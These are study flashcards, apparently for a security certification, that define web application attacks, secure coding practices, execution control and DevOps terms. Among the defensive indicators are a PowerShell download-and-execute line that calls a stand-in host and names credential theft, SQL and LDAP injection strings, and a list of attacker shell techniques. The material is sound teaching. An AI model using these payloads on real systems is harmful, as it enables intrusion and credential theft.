Lesson 14 Secure App Concepts Flashcards
TOCTOU
Time of Check/Time of Use
Race condition
CSRF (or XSRF, same) Cross Site Request Forgery
Client Side or Cross Site Request Forgery
- exploit applications that use cookies to authenticate users and track sessions
attacker gains control of the session cookie by tricking the victim into starting a session with the target while previously signed in to the trusted target
SSRF Server Side Request Forgeries
Server Side Request Forgeries exploit the lack of authentication between internal servers and services (implicit trust) and weak input validation
- allows the server to process arbitrary requests to target another service
- allows the attacker to submit unsanitized requests or API parameters
Session Hijacking
replaying a cookie in some way
attackers gain session cookies by sniffing on a public or unsecured network
Counter moves are to:
- encrypt cookies during transmission
- delete cookies from the client's browser cache after the session is completed
- deliver new cookie for each new session
Proper session management and token generation
- use non-predictable algorithm for token generation
- limit lifespan of a session
- require reauthentication after a certain period of time
API Attacks
App Programming Interfaces allow consumers to automate services on a web server and cloud services
Attackers exploit
- ineffective secrets management, allowing API keys to be discovered
- lack of input validation, unsanitized input
- error messages which give too much details about the system or network
- DoS by bombarding with spurious calls, protect through throttling/rate limiting mechanisms
Percent Encoding in a URL
Allows a user-agent to submit any safe or unsafe character to the server within a URL
% = %25, / = %2F, \ = %5C, < = %3C, > = %3E, space = %20
replay attack
using a valid session token via sniffing or guessing to re-establish a web app session illegitimately
PtH attack
Pass the Hash attack
attack uses hashed password on protocols that allow hashed passwords for authentication
such as Server Message Block (SMB) or NTLM or Kerberos
good for horizontal movement
difficult attack to detect as it exploits valid network behavior
DLL injection
Dynamic Link Library injection
exploits the OS functionality of allowing one process to attach to another
malware can inject a malicious library and then force a process to load it
Indicators:
- opening of unexpected network connections
- interacting with files and the registry in a suspicious manner
DoS
Denial of Service
attack causing the system or service to be temporarily or permanently unavailable
- send a bombardment of spurious calls to an API
- mitigate through throttling/rate-limiting mechanisms
SSL Stripping or HTTP Downgrade
- Combines a downgrade attack with a man-in-the-middle attack
- Effectively the attacker is a proxy, setting up a secure HTTP path with the server, while using an HTTP non-secure connection with the victim.
- Victim then sends credentials in the clear to the MitM who then uses the secure channel to the server
Mitigation:
- Instruct browsers not to use http
- Instruct Servers not to respond to http requests, only https requests
Memory Leak
an attack that causes a device to run out of memory (resource exhaustion), causing system instability or a crash
- can lead to a DoS
- starting sessions but not letting them complete causing state tables to fill
- resource exhaustion can lead to conditions for privilege escalation
race condition
a condition where a service attempts to perform two operations at nearly the same time, but due to the nature of the system the operations must be done in the correct order
can lead to a DoS or other instability
can lead to a null pointer dereference causing an app to crash
Shimming
Creating or modifying a DLL, driver, or API to get an app to act in a malicious way
A type of DLL injection attack
Attacks a feature of Windows which allows apps to run as if on legacy Windows OSs
Refactoring
rewriting code to perform same function but using different new methods
Malware uses this to change its signature to avoid AV sw detection
Normalization
A form of input validation
strips illegal characters from input and converts it to acceptable values prior to being entered into or processed by the database
Execution Control
Allow list
Block list
Execution control is a process of determining what additional sw or scripts may be installed or run on a host beyond its baseline
Allow list
- a list of allowable processes and scripts
- highly restrictive and can impede immediate needs/fixes
Block list
- a list of processes and scripts which can not be executed on the host
- it is permissive but vulnerable to sw which has not previously been identified as malicious
LAMP
LAMP (Linux, Apache, MySQL, PHP/Perl/Python) is a very common example of a web service stack, after its four original components: the Linux operating system, the Apache HTTP Server, the MySQL relational database management system (RDBMS), and the PHP programming language.
Application Attacks
an application vulnerability is a design flaw allowing security to be circumvented
- Privilege Escalation
- Error handling
- Improper Input handling
Privilege Escalation
- allows for arbitrary code execution or even remote code execution
- Vertical Privilege Escalation: a user/app can access functionality or data not available to them
- Horizontal Privilege Escalation: a user gains access to functionality or data intended for another user
Indicator:
- User or app running with higher than expected privileges
Error handling uses in app attacks
App attacks can cause errors in an attempt to glean more system details
An app should not divulge too much system information when an error occurs, such as type and configuration of a database server
Improper Input Handling
Most app attacks work by passing invalid or maliciously constructed data to the vulnerable process
Developers should always test for valid inputs
Usually described as overflow or injection type attacks
Overflow app attack
Attacker submits input which is too large to be stored in the variable assigned by the application
Indicators
- unexplained crashes
- error messages following a download
- execution of a new app or script
- connection to new hardware
Common attack types:
- buffer overflow
- integer overflow
Buffer Overflow
An attacker passes data to overfill the buffer of the stack, an area of memory used by an application
The attacker can change the return address or add code to execute a script (arbitrary code execution)
Stack Overflow
A stack is an area of memory used by a program subroutine which includes the return address of the program which called the subroutine.
Attacker can use a buffer overflow to change the return address to call malicious code instead of returning to the calling routine.
Integer Overflow
Attacker causes the target application to exceed the bounds defined by an integer to change the value from positive to negative.
Attacker could also attempt to make the buffer smaller in order to allow a buffer overflow attack
Pass the Hash
a credential exploit technique used for lateral movement
attacker gains a user's cached credentials when logged into a single sign-on system, allowing the attacker to use the credentials on other systems.
Usually it is the hashed password, and it can be used on the Windows file sharing protocol Server Message Block (SMB) or other protocols which accept NTLM hashes as authentication
Clickjacking
Victim sees and trusts a web app with a page containing a malicious layer allowing an attacker to intercept or redirect user input
launched by a compromise allowing the attacker to run arbitrary code as a script
mitigate by:
- HTTP response headers instructing browsers to not open frames from different origins (domains)
- ensuring buttons or input boxes are on the top most layer
XSS Attacks
Cross Site Scripting (XSS) is an application attack exploiting the client browser's trust in scripts coming from a server
Three Types:
Non-Persistent/Reflective
Persistent/Stored
Client Side DOM
Involves use of input validation vulnerability
Will see <script> or %script text in the URL crafted by an attacker
XSS Non-Persistent/Reflective
Cross Site Scripting (XSS) Non-Persistent/Reflective
- requires 3 actions
- attacker identifies input validation vulnerability in the trusted site
- attacker crafts a URL performing code injection against the trusted site and sends to victim to click the link
- once URL is clicked, trusted site sends the page with the injected malicious code, and browser executes the code
XSS Persistent/Stored Attack
Cross Site Scripting Persistent/Stored is an application attack
- aims to insert malicious code into a back-end database used by the trusted site
- the malicious code is then served to the client and executed in the client's browser
- this makes it persistent since all visitors will get the malicious code
- can be accomplished on sites with no input sanitation, like a message board
XSS Client side scripts/DOM
Cross Site Scripting (XSS) client side scripts attacks exploit vulnerabilities in the client side scripts which often use the DOM to modify content and layout of a web page.
- requires site to have input validation vulnerability and be identified by the attacker
- requires attacker to craft a URL to exploit the vulnerability and user to click it. Attacker adds a call to the malicious script
- server returns the page and if the script is in the DOM it will get executed in the client's browser
SQLi Attacks
Structured Query Language Injection attacks utilize input validation vulnerability to craft a SQL query within the URL
- will see a true statement in the input, like ‘or 1=1’, which tells SQL to return all info from the table
- requires input to not be sanitized
XML injection attacks
Exploits XML files which are not encrypted or input validated
Vulnerable to spoofing, request forgery, and injection of arbitrary data or code
Example is XML External Entity (XXE) where the SYSTEM entry is modified to some /etc file like /etc/config, which will then display the contents of the /etc/config as part of the response.
LDAP injection Attacks
Lightweight Directory Access Protocol injection attacks exploit unauthenticated access or vulnerability in a client app to submit arbitrary LDAP queries.
- similar to SQL injection just a different query language
- requires input to not be sanitized and use of something like bob)&()) for a username to bypass the password portion, causing the password filter to be dropped for a condition that's always true
Directory Traversal
An injection attack performed against a web app server
- input allows attacker to use the (../) directory traversal to navigate to the root directory
- only works when input is not sanitized and files are not properly controlled via permissions
- only works on server side file system
Command Injection Attack
Attack on a web app server attempting to run OS shell commands and return output to the browser
- requires some effort to get around server security mechanisms, but successful attempts are usually due to misconfiguration of the server
Secure Coding Techniques
Input Validation
Normalization
Output encoding
ServerSide vs ClientSide validation
Client Side
- offloads processing from Server
- gives too much control to client which could be vulnerable to malware, etc
Server Side
- More secure than client
- Not realistic in large deployment
Bad practice to rely solely on client side validation
Web App Security - Secure Cookies
Secure Cookies
- avoid using persistent cookies, always new session cookies
- Set secure attributes to prevent transport over HTTP
- set HttpOnly to not allow DOM/Client-side scripting
- use SameSite attribute to control where cookie may be sent to mitigate forgery attacks
Web Security - Response Headers important settings from server to client
Response headers
- HTTP Strict Transport Security (HSTS) forces browser to use HTTPS only
- Content Security Policy (CSP) to mitigate client side attacks (clickjacking, script injection, etc)
- Cache-Control to prevent caching of data to protect confidential and personal information
Error Handling
Code must be written to handle errors in such a way that an attacker cannot execute malicious code or perform an injection attack
Also do not divulge system information (platform info or inner workings of code) in the text of an error handler, better to use custom handlers to control what is displayed
Secure Code Usage
Code reuse - could expose vulnerability when used in a new set of conditions
3rd party library - need to monitor for vulnerabilities
SDK (software development kit) - need to monitor for vulnerabilities
Stored Procedures - provides a more secure method for DB queries as the queries are predefined
Dead Code
Should be removed as it could be misused by an attacker to exploit a vulnerability or misused in some other way
Also indicates code is not well maintained
Obfuscation
Use of an obfuscator on the compiled code to make the code more difficult to reverse engineer or mentally tough to analyze.
An obfuscator randomizes the names of variables, constants, functions and procedures, and removes comments and spaces from the compiled code.
Static Code Analysis
Analysis of code prior to being packaged as an executable.
Table Tops/code reviews of the code by others than the developer is ideal as it can detect potential issues or code to assist an insider threat, such as backdoors, logic bombs.
- can run source code analysis sw to scan for signatures of known issues, such as the OWASP top 10 or injection vulnerabilities
Dynamic Code Analysis
Testing code under real world conditions using a staging environment
Fuzzing
- testing the input validation routines of code.
- can be a test or a vulnerability scanner that exercises random inputs, valid and invalid, against the code and reports the results
- several types of fuzzers, Application UI, Protocol, and File Format
Code Signing
provides authenticity and integrity of the code
- developer creates a hash of the code and then signs it using their private key
- code is shipped with the developer's code signing certificate, which contains a public key the destination computer uses to read and verify the signature
- The OS then prompts the user to accept or deny the code
OS based execution control
Execution control is allow/block lists managed by an OS using 3rd party sec tools:
Windows built in features for this:
- Software Restriction Policies (SRP)
- AppLocker
- Windows Defender Application Control (WDAC)
Linux
- uses MAC (Mandatory Access Control) kernel module
- or Linux Security Module (LSM)
- SELinux
- AppArmor
Malicious Code Indicators
Main types of malicious activities when threat hunting or using a sandbox:
ShellCode - small program to exploit buffer overflow to gain privileges and then attack a network connection for downloading additional tools
Credential Dumping - access to credentials files or sniffing memory by the lsass.exe sys process
Lateral movement/insider attack - executing process remotely (psexec) to widen access by opening firewall ports or creating an account
Persistence - a backdoor an attacker uses when the host is restarted or user logs off. Look for AutoRun keys in the registry, adding a scheduled task, etc.
PowerShell malicious indicators
Cmdlets invoked to run some binary shell code
PowerShell.exe "IEX (New-Object Net.WebClient).DownloadString('https://badsite'); Do-Evil -StealCreds"
Bypassing execution policy
-noprofile or -ExecutionPolicy bypass arguments
System calls to the Windows API
[Kernel32]::LoadLibrary(.dll)
Using another type of script to execute the PowerShell is also suspicious
Bash and Python Malicious Indicators
Use of whoami and ifconfig/ipconfig to establish local context
Use of wget or curl to download tools
crontab entries added to enable persistence
add user to sudo and enable remote access via ssh
use iptables to change firewall rules
use nmap to scan other hosts
use of a reverse shell
high cpu usage and memory as happens with a crypto miner program, use top and free to diagnose
Macros and VB applications
A malicious actor could use a Word document as a vector to execute a PowerShell script using a macro
Man in the Browser attack
An on path attack where the web browser is compromised
Requires privileges and allows the attacker to inspect session cookies, certs, and data, change browser settings, perform redirection and inject code
Attackers use various sw kits installed on web servers which then download plugins or scripts to the client when visiting the server
Automation Scalability
The costs involved in supplying the service to more users is linear
if the number of users doubles, the cost to maintain the same level of service would also double. If more than double, then the service is less scalable
Automation Elasticity
The system's ability to handle changes on demand in real time.
High elasticity means the system will not experience loss of service or performance if the demand suddenly doubles.
The converse is also true, when demand is low the costs are reduced
Being able to reduce power or shut down when demand is low. When demand picks up the resource can grow in power to the level required.
SecDevOps environments
Development - code is developed
Test/integration - code from developers is merged together for initial testing, code builds and requirements met
Staging - a mirror of the production environment, focusing on usability and performance using test data
Production - application is released to end users
Provisioning
Process of deploying an application to the target environment
Deprovisioning
Process of removing an application from packages or instances
Version Control
An ID system for each iteration of a software product
Continuous Integration
developers should commit and test updates often
Effective CI uses an automated test suite to validate each build quickly
Continuous Delivery
Testing the infrastructure that supports the app, including networking, database functionality, client sw, etc
Continuous Deployment
process of actually making changes to the production environment to support the new app version
Continuous Monitoring
used to detect service failures and security incidents
should include monitoring of failover components
this capability is provided by security orchestration and response (SOAR) management sw
Continuous Validation
A verification and validation of a requirements model
Verification - ensures the product or system meets design goals
Validation - process to determine whether the application is fit-for-purpose
must ensure there is no drift from secure configuration baseline